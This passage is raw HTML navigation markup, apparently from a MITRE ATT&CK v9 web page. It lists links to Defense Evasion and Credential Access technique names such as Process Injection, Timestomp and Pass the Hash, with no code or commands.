Event Logging </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1562-T1562.003"> <a href="/versions/v9/techniques/T1562/003/"> Impair Command History Logging </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1562-T1562.004"> <a href="/versions/v9/techniques/T1562/004/"> Disable or Modify System Firewall </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1562-T1562.006"> <a href="/versions/v9/techniques/T1562/006/"> Indicator Blocking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1562-T1562.007"> <a href="/versions/v9/techniques/T1562/007/"> Disable or 
Modify Cloud Firewall </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1562-T1562.008"> <a href="/versions/v9/techniques/T1562/008/"> Disable Cloud Logs </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1070"> <a href="/versions/v9/techniques/T1070/"> Indicator Removal on Host </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1070-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1070-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1070-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1070-body" aria-labelledby="enterprise-TA0005-T1070-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1070-T1070.001"> <a href="/versions/v9/techniques/T1070/001/"> Clear Windows Event Logs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1070-T1070.002"> <a href="/versions/v9/techniques/T1070/002/"> Clear Linux or Mac System Logs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1070-T1070.003"> <a href="/versions/v9/techniques/T1070/003/"> Clear Command History </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1070-T1070.004"> <a href="/versions/v9/techniques/T1070/004/"> File Deletion </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1070-T1070.005"> <a href="/versions/v9/techniques/T1070/005/"> Network Share Connection Removal </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1070-T1070.006"> <a href="/versions/v9/techniques/T1070/006/"> Timestomp </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1202"> <a href="/versions/v9/techniques/T1202/"> Indirect Command Execution </a> </div> </div> <div class="sidenav"> <div class="sidenav-head 
" id="enterprise-TA0005-T1036"> <a href="/versions/v9/techniques/T1036/"> Masquerading </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1036-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1036-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1036-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1036-body" aria-labelledby="enterprise-TA0005-T1036-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1036-T1036.001"> <a href="/versions/v9/techniques/T1036/001/"> Invalid Code Signature </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1036-T1036.002"> <a href="/versions/v9/techniques/T1036/002/"> Right-to-Left Override </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1036-T1036.003"> <a href="/versions/v9/techniques/T1036/003/"> Rename System Utilities </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1036-T1036.004"> <a href="/versions/v9/techniques/T1036/004/"> Masquerade Task or Service </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1036-T1036.005"> <a href="/versions/v9/techniques/T1036/005/"> Match Legitimate Name or Location </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1036-T1036.006"> <a href="/versions/v9/techniques/T1036/006/"> Space after Filename </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1556"> <a href="/versions/v9/techniques/T1556/"> Modify Authentication Process </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1556-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1556-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1556-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1556-body" 
aria-labelledby="enterprise-TA0005-T1556-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1556-T1556.001"> <a href="/versions/v9/techniques/T1556/001/"> Domain Controller Authentication </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1556-T1556.002"> <a href="/versions/v9/techniques/T1556/002/"> Password Filter DLL </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1556-T1556.003"> <a href="/versions/v9/techniques/T1556/003/"> Pluggable Authentication Modules </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1556-T1556.004"> <a href="/versions/v9/techniques/T1556/004/"> Network Device Authentication </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1578"> <a href="/versions/v9/techniques/T1578/"> Modify Cloud Compute Infrastructure </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1578-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1578-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1578-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1578-body" aria-labelledby="enterprise-TA0005-T1578-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1578-T1578.001"> <a href="/versions/v9/techniques/T1578/001/"> Create Snapshot </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1578-T1578.002"> <a href="/versions/v9/techniques/T1578/002/"> Create Cloud Instance </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1578-T1578.003"> <a href="/versions/v9/techniques/T1578/003/"> Delete Cloud Instance </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1578-T1578.004"> <a href="/versions/v9/techniques/T1578/004/"> Revert Cloud Instance </a> </div> </div> </div> 
</div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1112"> <a href="/versions/v9/techniques/T1112/"> Modify Registry </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1601"> <a href="/versions/v9/techniques/T1601/"> Modify System Image </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1601-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1601-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1601-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1601-body" aria-labelledby="enterprise-TA0005-T1601-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1601-T1601.001"> <a href="/versions/v9/techniques/T1601/001/"> Patch System Image </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1601-T1601.002"> <a href="/versions/v9/techniques/T1601/002/"> Downgrade System Image </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1599"> <a href="/versions/v9/techniques/T1599/"> Network Boundary Bridging </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1599-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1599-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1599-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1599-body" aria-labelledby="enterprise-TA0005-T1599-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1599-T1599.001"> <a href="/versions/v9/techniques/T1599/001/"> Network Address Translation Traversal </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1027"> <a href="/versions/v9/techniques/T1027/"> Obfuscated Files or Information </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1027-header" data-toggle="collapse" 
data-target="#enterprise-TA0005-T1027-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1027-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1027-body" aria-labelledby="enterprise-TA0005-T1027-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1027-T1027.001"> <a href="/versions/v9/techniques/T1027/001/"> Binary Padding </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1027-T1027.002"> <a href="/versions/v9/techniques/T1027/002/"> Software Packing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1027-T1027.003"> <a href="/versions/v9/techniques/T1027/003/"> Steganography </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1027-T1027.004"> <a href="/versions/v9/techniques/T1027/004/"> Compile After Delivery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1027-T1027.005"> <a href="/versions/v9/techniques/T1027/005/"> Indicator Removal from Tools </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1542"> <a href="/versions/v9/techniques/T1542/"> Pre-OS Boot </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1542-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1542-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1542-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1542-body" aria-labelledby="enterprise-TA0005-T1542-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1542-T1542.001"> <a href="/versions/v9/techniques/T1542/001/"> System Firmware </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1542-T1542.002"> <a href="/versions/v9/techniques/T1542/002/"> Component Firmware </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" 
id="enterprise-TA0005-T1542-T1542.003"> <a href="/versions/v9/techniques/T1542/003/"> Bootkit </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1542-T1542.004"> <a href="/versions/v9/techniques/T1542/004/"> ROMMONkit </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1542-T1542.005"> <a href="/versions/v9/techniques/T1542/005/"> TFTP Boot </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1055"> <a href="/versions/v9/techniques/T1055/"> Process Injection </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1055-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1055-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1055-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1055-body" aria-labelledby="enterprise-TA0005-T1055-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.001"> <a href="/versions/v9/techniques/T1055/001/"> Dynamic-link Library Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.002"> <a href="/versions/v9/techniques/T1055/002/"> Portable Executable Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.003"> <a href="/versions/v9/techniques/T1055/003/"> Thread Execution Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.004"> <a href="/versions/v9/techniques/T1055/004/"> Asynchronous Procedure Call </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.005"> <a href="/versions/v9/techniques/T1055/005/"> Thread Local Storage </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.008"> <a href="/versions/v9/techniques/T1055/008/"> Ptrace System Calls </a> 
</div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.009"> <a href="/versions/v9/techniques/T1055/009/"> Proc Memory </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.011"> <a href="/versions/v9/techniques/T1055/011/"> Extra Window Memory Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.012"> <a href="/versions/v9/techniques/T1055/012/"> Process Hollowing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.013"> <a href="/versions/v9/techniques/T1055/013/"> Process Doppelgänging </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.014"> <a href="/versions/v9/techniques/T1055/014/"> VDSO Hijacking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1207"> <a href="/versions/v9/techniques/T1207/"> Rogue Domain Controller </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1014"> <a href="/versions/v9/techniques/T1014/"> Rootkit </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1218"> <a href="/versions/v9/techniques/T1218/"> Signed Binary Proxy Execution </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1218-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1218-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1218-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1218-body" aria-labelledby="enterprise-TA0005-T1218-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.001"> <a href="/versions/v9/techniques/T1218/001/"> Compiled HTML File </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.002"> <a 
href="/versions/v9/techniques/T1218/002/"> Control Panel </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.003"> <a href="/versions/v9/techniques/T1218/003/"> CMSTP </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.004"> <a href="/versions/v9/techniques/T1218/004/"> InstallUtil </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.005"> <a href="/versions/v9/techniques/T1218/005/"> Mshta </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.007"> <a href="/versions/v9/techniques/T1218/007/"> Msiexec </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.008"> <a href="/versions/v9/techniques/T1218/008/"> Odbcconf </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.009"> <a href="/versions/v9/techniques/T1218/009/"> Regsvcs/Regasm </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.010"> <a href="/versions/v9/techniques/T1218/010/"> Regsvr32 </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.011"> <a href="/versions/v9/techniques/T1218/011/"> Rundll32 </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.012"> <a href="/versions/v9/techniques/T1218/012/"> Verclsid </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1216"> <a href="/versions/v9/techniques/T1216/"> Signed Script Proxy Execution </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1216-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1216-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1216-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1216-body" 
aria-labelledby="enterprise-TA0005-T1216-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1216-T1216.001"> <a href="/versions/v9/techniques/T1216/001/"> PubPrn </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1553"> <a href="/versions/v9/techniques/T1553/"> Subvert Trust Controls </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1553-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1553-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1553-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1553-body" aria-labelledby="enterprise-TA0005-T1553-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1553-T1553.001"> <a href="/versions/v9/techniques/T1553/001/"> Gatekeeper Bypass </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1553-T1553.002"> <a href="/versions/v9/techniques/T1553/002/"> Code Signing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1553-T1553.003"> <a href="/versions/v9/techniques/T1553/003/"> SIP and Trust Provider Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1553-T1553.004"> <a href="/versions/v9/techniques/T1553/004/"> Install Root Certificate </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1553-T1553.005"> <a href="/versions/v9/techniques/T1553/005/"> Mark-of-the-Web Bypass </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1553-T1553.006"> <a href="/versions/v9/techniques/T1553/006/"> Code Signing Policy Modification </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1221"> <a href="/versions/v9/techniques/T1221/"> Template Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " 
id="enterprise-TA0005-T1205"> <a href="/versions/v9/techniques/T1205/"> Traffic Signaling </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1205-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1205-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1205-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1205-body" aria-labelledby="enterprise-TA0005-T1205-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1205-T1205.001"> <a href="/versions/v9/techniques/T1205/001/"> Port Knocking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1127"> <a href="/versions/v9/techniques/T1127/"> Trusted Developer Utilities Proxy Execution </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1127-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1127-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1127-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1127-body" aria-labelledby="enterprise-TA0005-T1127-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1127-T1127.001"> <a href="/versions/v9/techniques/T1127/001/"> MSBuild </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1535"> <a href="/versions/v9/techniques/T1535/"> Unused/Unsupported Cloud Regions </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1550"> <a href="/versions/v9/techniques/T1550/"> Use Alternate Authentication Material </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1550-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1550-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1550-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1550-body" aria-labelledby="enterprise-TA0005-T1550-header"> <div 
class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1550-T1550.001"> <a href="/versions/v9/techniques/T1550/001/"> Application Access Token </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1550-T1550.002"> <a href="/versions/v9/techniques/T1550/002/"> Pass the Hash </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1550-T1550.003"> <a href="/versions/v9/techniques/T1550/003/"> Pass the Ticket </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1550-T1550.004"> <a href="/versions/v9/techniques/T1550/004/"> Web Session Cookie </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1078"> <a href="/versions/v9/techniques/T1078/"> Valid Accounts </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1078-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1078-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1078-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1078-body" aria-labelledby="enterprise-TA0005-T1078-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1078-T1078.001"> <a href="/versions/v9/techniques/T1078/001/"> Default Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1078-T1078.002"> <a href="/versions/v9/techniques/T1078/002/"> Domain Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1078-T1078.003"> <a href="/versions/v9/techniques/T1078/003/"> Local Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1078-T1078.004"> <a href="/versions/v9/techniques/T1078/004/"> Cloud Accounts </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1497"> <a href="/versions/v9/techniques/T1497/"> 
Virtualization/Sandbox Evasion </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1497-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1497-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1497-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1497-body" aria-labelledby="enterprise-TA0005-T1497-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1497-T1497.001"> <a href="/versions/v9/techniques/T1497/001/"> System Checks </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1497-T1497.002"> <a href="/versions/v9/techniques/T1497/002/"> User Activity Based Checks </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1497-T1497.003"> <a href="/versions/v9/techniques/T1497/003/"> Time Based Evasion </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1600"> <a href="/versions/v9/techniques/T1600/"> Weaken Encryption </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1600-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1600-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1600-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1600-body" aria-labelledby="enterprise-TA0005-T1600-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1600-T1600.001"> <a href="/versions/v9/techniques/T1600/001/"> Reduce Key Space </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1600-T1600.002"> <a href="/versions/v9/techniques/T1600/002/"> Disable Crypto Hardware </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1220"> <a href="/versions/v9/techniques/T1220/"> XSL Script Processing </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " 
id="enterprise-TA0006"> <a href="/versions/v9/tactics/TA0006"> Credential Access </a> <div class="expand-button collapsed" id="enterprise-TA0006-header" data-toggle="collapse" data-target="#enterprise-TA0006-body" aria-expanded="false" aria-controls="#enterprise-TA0006-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0006-body" aria-labelledby="enterprise-TA0006-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1110"> <a href="/versions/v9/techniques/T1110/"> Brute Force </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1110-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1110-body" aria-expanded="false" aria-controls="#enterprise-TA0006-T1110-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0006-T1110-body" aria-labelledby="enterprise-TA0006-T1110-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1110-T1110.001"> <a href="/versions/v9/techniques/T1110/001/"> Password Guessing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1110-T1110.002"> <a href="/versions/v9/techniques/T1110/002/"> Password Cracking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1110-T1110.003"> <a href="/versions/v9/techniques/T1110/003/"> Password Spraying </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1110-T1110.004"> <a href="/versions/v9/techniques/T1110/004/"> Credential Stuffing </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1555"> <a href="/versions/v9/techniques/T1555/"> Credentials from Password Stores </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1555-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1555-body" aria-expanded="false" aria-controls="#enterprise-TA0006-T1555-body"></div> </div> <div class="sidenav-body collapse" 
id="enterprise-TA0006-T1555-body" aria-labelledby="enterprise-TA0006-T1555-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1555-T1555.001"> <a href="/versions/v9/techniques/T1555/001/"> Keychain </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1555-T1555.002"> <a href="/versions/v9/techniques/T1555/002/"> Securityd Memory </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1555-T1555.003"> <a href="/versions/v9/techniques/T1555/003/"> Credentials from Web Browsers </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1555-T1555.004"> <a href="/versions/v9/techniques/T1555/004/"> Windows Credential Manager </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1555-T1555.005"> <a href="/versions/v9/techniques/T1555/005/"> Password Managers </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1212"> <a href="/versions/v9/techniques/T1212/"> Exploitation for Credential Access </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1187"> <a href="/versions/v9/techniques/T1187/"> Forced Authentication </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1606"> <a href="/versions/v9/techniques/T1606/"> Forge Web Credentials </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1606-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1606-body" aria-expanded="false" aria-controls="#enterprise-TA0006-T1606-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0006-T1606-body" aria-labelledby="enterprise-TA0006-T1606-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1606-T1606.001"> <a href="/versions/v9/techniques/T1606/001/"> Web Cookies </a> </div> </div> <div class="sidenav"> <div 
class="sidenav-head" id="enterprise-TA0006-T1606-T1606.002"> <a href="/versions/v9/techniques/T1606/002/"> SAML Tokens </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1056"> <a href="/versions/v9/techniques/T1056/"> Input Capture </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1056-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1056-body" aria-expanded="false" aria-controls="#enterprise-TA0006-T1056-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0006-T1056-body" aria-labelledby="enterprise-TA0006-T1056-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1056-T1056.001"> <a href="/versions/v9/techniques/T1056/001/"> Keylogging </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1056-T1056.002"> <a href="/versions/v9/techniques/T1056/002/"> GUI Input Capture </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1056-T1056.003"> <a href="/versions/v9/techniques/T1056/003/"> Web Portal Capture </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1056-T1056.004"> <a href="/versions/v9/techniques/T1056/004/"> Credential API Hooking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1557"> <a href="/versions/v9/techniques/T1557/"> Man-in-the-Middle </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1557-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1557-body" aria-expanded="false" aria-controls="#enterprise-TA0006-T1557-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0006-T1557-body" aria-labelledby="enterprise-TA0006-T1557-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1557-T1557.001"> <a href="/versions/v9/techniques/T1557/001/"> LLMNR/NBT-NS Poisoning and SMB Relay </a> </div> 
